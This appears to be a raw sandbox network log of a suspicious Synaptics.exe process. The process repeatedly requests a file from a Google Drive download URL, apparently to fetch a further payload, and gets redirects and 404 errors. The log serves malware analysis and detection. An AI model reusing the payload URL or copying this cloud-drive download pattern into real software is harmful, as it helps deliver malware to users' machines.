Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:37 UTC | 1243 | IN | HTTP/1.1 404 Not Found
X-GUploader-UploadID: AFiumC5YPc1ULt8QZ-Us8tJ_EIOQD20fJ2C6WMFqK58Gcy3JtlPGbuOb1jjVKUFMKlVynchR
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:48:37 GMT
Content-Security-Policy: script-src 'report-sample' 'nonce-edkOwu2j-iEUONHPmvuOiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Length: 1652
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
Connection: close
2024-12-30 10:48:37 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:37 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="KEVaDrgsVegwUIQHOwCmEg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:37 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.7 | 50138 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:39 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:40 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:48:40 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: script-src 'report-sample' 'nonce-DT41XvRzp2phUw9TZeNgBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.7 | 50139 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:39 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:40 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:48:40 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-PRrvAHelIqvRNlHh-4YZDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
109 | 192.168.2.7 | 50142 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:40 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:41 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7KspgTarYC98GTxCEEfemMoteZyUovq4tHirlllT1B9zoR1H8Kp42fGTIvxRwih4q6
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:41 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-bLwLag8mvozZL2YTB9cKQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:41 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:41 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="CEkf-Pw7TiRG2Xr1xPtDYw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:41 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
110 | 192.168.2.7 | 50141 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:40 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:41 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4hf7sEeORlDyKXjBCDsncCiep8fhwQ_sk3_g3Pm679hxvUW0SELRocx8_RbYk79zJS
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:41 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-V7GlkiGI3o_Kb5cmwLQ_OQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:41 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:41 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="xH6yh2T2-MdCnffbpCA7Mg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:41 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
111 | 192.168.2.7 | 50140 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:40 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:41 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:41 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-5gwrbVGJMn5j4_PnvzFhIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
112 | 192.168.2.7 | 50143 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:40 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:41 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:41 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-qdjzyz-F_KivGjwqCgJ5lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
113 | 192.168.2.7 | 50146 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:41 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:42 UTC  1250  IN  HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6cXagbHJkGnYe61YgkcEAzrj60IfJm3lpPnYIfH262dnPF9dkFFSsLdceFM_AN0DriTvcw0hk
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:42 GMT
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-tVAKuSPDVFGiQ8-CkEhiPQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:42 UTC  140  IN  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:48:42 UTC  1390  IN  Data Ascii: 404 (Not Found)!!1</title><style nonce="My6OmzumQ7dhOA9BSVgRPA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:48:42 UTC  122  IN  Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
114  192.168.2.7  50145  142.250.185.78  443  7744  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-30 10:48:41 UTC  345  OUT  GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:42 UTC  1314  IN  HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:42 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-NCOJAr8gyA4S9PkJy8hM9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
115  192.168.2.7  50147  142.250.185.78  443  7744  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-30 10:48:41 UTC  345  OUT  GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:42 UTC  1314  IN  HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:42 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-9AauJfXA7jWRIXuSuysz6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
116  192.168.2.7  50150  142.250.186.161  443  7744  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-30 10:48:41 UTC  388  OUT  GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:42 UTC  1243  IN  HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7_S5M_jRT_ho84kNefIPTdX51o5Lsfqgx2nAx8ofb92AXhaROX4z_Y1T6mi1f-b3j2
